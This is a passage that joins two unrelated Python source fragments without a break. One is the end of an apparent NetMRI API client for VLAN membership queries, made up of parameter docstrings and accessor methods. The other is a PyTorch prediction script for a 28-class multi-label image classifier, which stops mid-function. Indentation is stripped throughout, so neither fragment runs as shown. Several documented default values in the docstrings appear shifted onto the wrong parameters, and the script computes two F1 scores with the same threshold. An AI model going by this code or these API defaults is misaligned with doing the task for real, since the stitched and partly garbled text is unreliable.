:param val_c_StpHoldTime: If op_StpHoldTime is specified, this value will be compared to the value in StpHoldTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpHoldTime must be specified if op_StpHoldTime is specified.
:type val_c_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpMaxAge: The operator to apply to the field StpMaxAge. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpMaxAge: If op_StpMaxAge is specified, the field named in this input will be compared to the value in StpMaxAge using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpMaxAge must be specified if op_StpMaxAge is specified.
:type val_f_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpMaxAge: If op_StpMaxAge is specified, this value will be compared to the value in StpMaxAge using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpMaxAge must be specified if op_StpMaxAge is specified.
:type val_c_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpPriority: The operator to apply to the field StpPriority. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpPriority: If op_StpPriority is specified, the field named in this input will be compared to the value in StpPriority using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpPriority must be specified if op_StpPriority is specified.
:type val_f_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpPriority: If op_StpPriority is specified, this value will be compared to the value in StpPriority using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpPriority must be specified if op_StpPriority is specified.
:type val_c_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpProtocolSpecification: The operator to apply to the field StpProtocolSpecification. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpProtocolSpecification: If op_StpProtocolSpecification is specified, the field named in this input will be compared to the value in StpProtocolSpecification using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpProtocolSpecification must be specified if op_StpProtocolSpecification is specified.
:type val_f_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpProtocolSpecification: If op_StpProtocolSpecification is specified, this value will be compared to the value in StpProtocolSpecification using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpProtocolSpecification must be specified if op_StpProtocolSpecification is specified.
:type val_c_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpRootCost: The operator to apply to the field StpRootCost. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpRootCost: If op_StpRootCost is specified, the field named in this input will be compared to the value in StpRootCost using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpRootCost must be specified if op_StpRootCost is specified.
:type val_f_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpRootCost: If op_StpRootCost is specified, this value will be compared to the value in StpRootCost using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpRootCost must be specified if op_StpRootCost is specified.
:type val_c_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpRootPort: The operator to apply to the field StpRootPort. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpRootPort: If op_StpRootPort is specified, the field named in this input will be compared to the value in StpRootPort using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpRootPort must be specified if op_StpRootPort is specified.
:type val_f_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpRootPort: If op_StpRootPort is specified, this value will be compared to the value in StpRootPort using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpRootPort must be specified if op_StpRootPort is specified.
:type val_c_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpTopChanges: The operator to apply to the field StpTopChanges. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpTopChanges: If op_StpTopChanges is specified, the field named in this input will be compared to the value in StpTopChanges using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpTopChanges must be specified if op_StpTopChanges is specified.
:type val_f_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpTopChanges: If op_StpTopChanges is specified, this value will be compared to the value in StpTopChanges using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpTopChanges must be specified if op_StpTopChanges is specified.
:type val_c_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VTPDomain: The operator to apply to the field VTPDomain. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VTPDomain: Management domain name if VLAN is VTP managed. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VTPDomain: If op_VTPDomain is specified, the field named in this input will be compared to the value in VTPDomain using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VTPDomain must be specified if op_VTPDomain is specified.
:type val_f_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VTPDomain: If op_VTPDomain is specified, this value will be compared to the value in VTPDomain using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VTPDomain must be specified if op_VTPDomain is specified.
:type val_c_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanID: The operator to apply to the field VlanID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanID: If op_VlanID is specified, the field named in this input will be compared to the value in VlanID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanID must be specified if op_VlanID is specified.
:type val_f_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanID: If op_VlanID is specified, this value will be compared to the value in VlanID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanID must be specified if op_VlanID is specified.
:type val_c_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberChangedCols: The operator to apply to the field VlanMemberChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberChangedCols: If op_VlanMemberChangedCols is specified, the field named in this input will be compared to the value in VlanMemberChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberChangedCols must be specified if op_VlanMemberChangedCols is specified.
:type val_f_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberChangedCols: If op_VlanMemberChangedCols is specified, this value will be compared to the value in VlanMemberChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberChangedCols must be specified if op_VlanMemberChangedCols is specified.
:type val_c_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberEndTime: The operator to apply to the field VlanMemberEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberEndTime: If op_VlanMemberEndTime is specified, the field named in this input will be compared to the value in VlanMemberEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberEndTime must be specified if op_VlanMemberEndTime is specified.
:type val_f_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberEndTime: If op_VlanMemberEndTime is specified, this value will be compared to the value in VlanMemberEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberEndTime must be specified if op_VlanMemberEndTime is specified.
:type val_c_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberID: The operator to apply to the field VlanMemberID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberID: The internal NetMRI identifier for this VLAN membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberID: If op_VlanMemberID is specified, the field named in this input will be compared to the value in VlanMemberID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberID must be specified if op_VlanMemberID is specified.
:type val_f_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberID: If op_VlanMemberID is specified, this value will be compared to the value in VlanMemberID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberID must be specified if op_VlanMemberID is specified.
:type val_c_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberStartTime: The operator to apply to the field VlanMemberStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberStartTime: The starting effective time of this revision of the record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberStartTime: If op_VlanMemberStartTime is specified, the field named in this input will be compared to the value in VlanMemberStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberStartTime must be specified if op_VlanMemberStartTime is specified.
:type val_f_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberStartTime: If op_VlanMemberStartTime is specified, this value will be compared to the value in VlanMemberStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberStartTime must be specified if op_VlanMemberStartTime is specified.
:type val_c_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberTimestamp: The operator to apply to the field VlanMemberTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberTimestamp: If op_VlanMemberTimestamp is specified, the field named in this input will be compared to the value in VlanMemberTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberTimestamp must be specified if op_VlanMemberTimestamp is specified.
:type val_f_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberTimestamp: If op_VlanMemberTimestamp is specified, this value will be compared to the value in VlanMemberTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberTimestamp must be specified if op_VlanMemberTimestamp is specified.
:type val_c_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanName: The operator to apply to the field VlanName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanName: If op_VlanName is specified, the field named in this input will be compared to the value in VlanName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanName must be specified if op_VlanName is specified.
:type val_f_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanName: If op_VlanName is specified, this value will be compared to the value in VlanName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanName must be specified if op_VlanName is specified.
:type val_c_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanState: The operator to apply to the field VlanState. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanState: The state of this VLAN on this device. Empty for non-bridge members.
The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanState: If op_VlanState is specified, the field named in this input will be compared to the value in VlanState using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanState must be specified if op_VlanState is specified.
:type val_f_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanState: If op_VlanState is specified, this value will be compared to the value in VlanState using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanState must be specified if op_VlanState is specified.
:type val_c_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanType: The operator to apply to the field VlanType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanType: If op_VlanType is specified, the field named in this input will be compared to the value in VlanType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanType must be specified if op_VlanType is specified.
:type val_f_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanType: If op_VlanType is specified, this value will be compared to the value in VlanType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanType must be specified if op_VlanType is specified.
:type val_c_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_network_id: The operator to apply to the field network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. network_id: The Network View ID assigned to the Vlan membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_network_id: If op_network_id is specified, the field named in this input will be compared to the value in network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_network_id must be specified if op_network_id is specified.
:type val_f_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_network_id: If op_network_id is specified, this value will be compared to the value in network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_network_id must be specified if op_network_id is specified.
:type val_c_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
"""The NetMRI device that collected this record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The NetMRI device that collected this record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def interface(self, **kwargs):
"""The switched virtual interface for this VLAN on this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The switched virtual interface for this VLAN on this device.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("interface"), kwargs)
def vlan(self, **kwargs):
"""The VLAN associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The VLAN associated with this VLAN membership.
:rtype : Vlan
"""
return self.api_request(self._get_method_fullname("vlan"), kwargs)
def infradevice(self, **kwargs):
"""The device associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device associated with this VLAN membership.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("infradevice"), kwargs)
def network_id(self, **kwargs):
"""The Network View ID assigned to the Vlan membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The Network View ID assigned to the Vlan membership.
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("network_id"), kwargs)
def device(self, **kwargs):
"""The device associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device associated with this VLAN membership.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
|
import argparse
import os
from collections import defaultdict
import numpy as np
import pandas as pd
import torch
import torch.optim as optim
import torchsummary
from torch.optim import lr_scheduler
from torch.utils.data import DataLoader
from torchvision import datasets, models, transforms
from tqdm import tqdm
from typing import List
import skimage.io
from sklearn.metrics import f1_score
import torch.nn as nn
import torch.nn.functional as F
import pretrainedmodels
import config
import matplotlib.pyplot as plt
import classification_dataset
from classification_dataset import ClassificationDataset,ClassificationDatasetTest
from logger import Logger
from config import NB_CATEGORIES
from experiments import MODELS
import yaml
train_probs = {
0: 41.47,
1: 4.04,
2: 11.65,
3: 5.02,
4: 5.98,
5: 8.09,
6: 3.24,
7: 9.08,
8: 0.17,
9: 0.14,
10: 0.09,
11: 3.52,
12: 2.21,
13: 1.73,
14: 3.43,
15: 0.07,
16: 1.71,
17: 0.68,
18: 2.90,
19: 4.77,
20: 0.55,
21: 12.16,
22: 2.58,
23: 9.54,
24: 1.04,
25: 26.48,
26: 1.06,
27: 0.04,
}
def tta_images(img):
rotated = img.transpose(2, 3)
res = [img,
img.flip(2),
img.flip(3),
img.flip(2, 3),
rotated,
rotated.flip(2),
rotated.flip(3),
rotated.flip(2, 3)]
return res
def test_tta_images():
plane = np.array([[0, 0, 1],
[0, 0, 1],
[0, 1, 1]], dtype=np.uint8)
img = np.array([[plane]])
print(img.shape)
for t in tta_images(torch.tensor(img)):
print(t)
# test_tta_images()
def fit_prob_th(results, scale_small=1.0):
thresholds = []
for cat, train_prob in train_probs.items():
train_prob /= 100.0
target_prob = (train_prob**scale_small) / (0.5 ** scale_small) / 1.95
target_count = int(results.shape[0] * target_prob)
target_count = np.clip(target_count, 0, results.shape[0]-1)
threshold = np.sort(results[:, cat].copy())[-target_count]
thresholds.append(threshold)
print(f'{cat:02} {threshold:0.3f} {target_prob:0.3f} {target_count}')
return np.array(thresholds)
def predict(submission_name):
results = []
dataset = ClassificationDatasetTest(transform=lambda x: torch.from_numpy(x))
data_loader = DataLoader(
dataset,
num_workers=8,
batch_size=4,
drop_last=False)
submission_config = yaml.load(open(f'../submissions/{submission_name}.yaml'))
os.makedirs('../output/predict_cache', exist_ok=True)
use_tta = submission_config.get('use_tta', False)
for model_cfg in submission_config['models']:
model_name = model_cfg['model']
run = model_cfg.get('run', '')
folds = model_cfg.get('folds', config.FOLDS)
run_str = '' if run is None else f'_{run}'
model_info = MODELS[model_name]
print(model_name)
for fold in folds:
try:
checkpoint = model_cfg['fold_checkpoints'][fold]
except IndexError:
continue
except KeyError:
continue
checkpoints_dir = f'../output/checkpoints/{model_name}{run_str}_{fold}'
print(f'fold {fold} checkpoint {checkpoint}')
suffix = '_tta' if use_tta else ''
cache_fn = f'../output/predict_cache/{model_name}{run_str}_fold_{fold}_ch_{checkpoint:03}{suffix}.pt'
try:
fold_outputs = torch.load(cache_fn)
except FileNotFoundError:
model = model_info.factory(**model_info.args)
state_dict = torch.load(f'{checkpoints_dir}/{checkpoint:03}.pt')
if 'model_state_dict' in state_dict:
state_dict = state_dict['model_state_dict']
model.load_state_dict(state_dict)
model = model.cuda()
model.eval()
with torch.set_grad_enabled(False):
fold_outputs = []
for iter_num, data in tqdm(enumerate(data_loader), total=len(data_loader)):
tta_predictions = []
images = tta_images(data['img']) if use_tta else [data['img']]
for img in images:
output = model(img.cuda())
output = torch.sigmoid(output)
tta_predictions.append(output.detach().cpu().numpy())
fold_outputs.append(np.stack(tta_predictions, axis=1))
fold_outputs = np.concatenate(fold_outputs, axis=0)
torch.save(fold_outputs, cache_fn)
results.append(fold_outputs) # dimensions: fold, id, tta, class_predictions
results = np.array(results)
print(results.shape)
results = np.mean(results, axis=(0, 2))
if 'thresholds' in submission_config:
if submission_config['thresholds'] == 'fix_prob':
threshold = fit_prob_th(results, scale_small=submission_config['thresholds_scale'])
else:
threshold = np.array(submission_config['thresholds'])
else:
threshold = 0.5
pred_list = []
for line in results:
predictions = np.nonzero(line > threshold)[0]
s = ' '.join(list([str(i) for i in predictions]))
# if len(predictions) == 0:
# s = str(np.argmax(line / threshold))
pred_list.append(s)
sample_df = dataset.data
sample_df.Predicted = pred_list
sample_df.to_csv(f'../submissions/{submission_name}.csv', header=True, index=False)
def print_perc_and_f1_from_prob(data, labels, thresholds_sub, threshold=0.375):
# samples = defaultdict(int)
# for line in data:
# for i in np.nonzero(line > threshold)[0]:
# samples[i] += 1
f1_hist = []
f1_05_hist = []
f1_opt_hist = []
f1_sub_hist = []
for key in range(config.NB_CATEGORIES):
f1 = f1_score(labels[:, key], data[:, key] > threshold, average='binary')
f1_05 = f1_score(labels[:, key], data[:, key] > threshold, average='binary')
